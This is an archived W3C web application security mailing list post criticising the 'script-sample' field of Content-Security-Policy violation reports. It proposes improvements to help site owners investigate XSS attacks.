W3C home > Mailing lists > Public > public-webappsec@w3.org > March 2017

Content-Security-Policy: a "script-sample" report field is inadequate

From: Виноградов Сергей <fdsc@yandex.ru>
Date: Fri, 03 Mar 2017 18:39:59 +0300
To: public-webappsec@w3.org
Message-Id: <4349721488555599@web24h.yandex.ru>
Hello
I would like to give examples of how unhelpful are CSP violation reports ( https://www.w3.org/TR/CSP2/ )

A "script-sample" report field below

1. " ;(function() { \n     try { \n         /*..."

2. "/* See license.txt for terms of usage */..."

3.  A hacker can fill out the CSP report by spaces at the beginning. Need to ignore whitespaces and newlines.
"(function(){                            ..."

4. AJAX scripts can load other scripts. So the web master need a field that which identify the cause of download script if the script loaded from other allowed the script

5. If the script appeared on the page, then web master need to give the html environment of this script ( to understand how was conducted an XSS attack).
Received on Monday, 6 March 2017 10:24:13 UTC

This archive was generated by hypermail 2.3.1 : Monday, 23 October 2017 14:54:22 UTC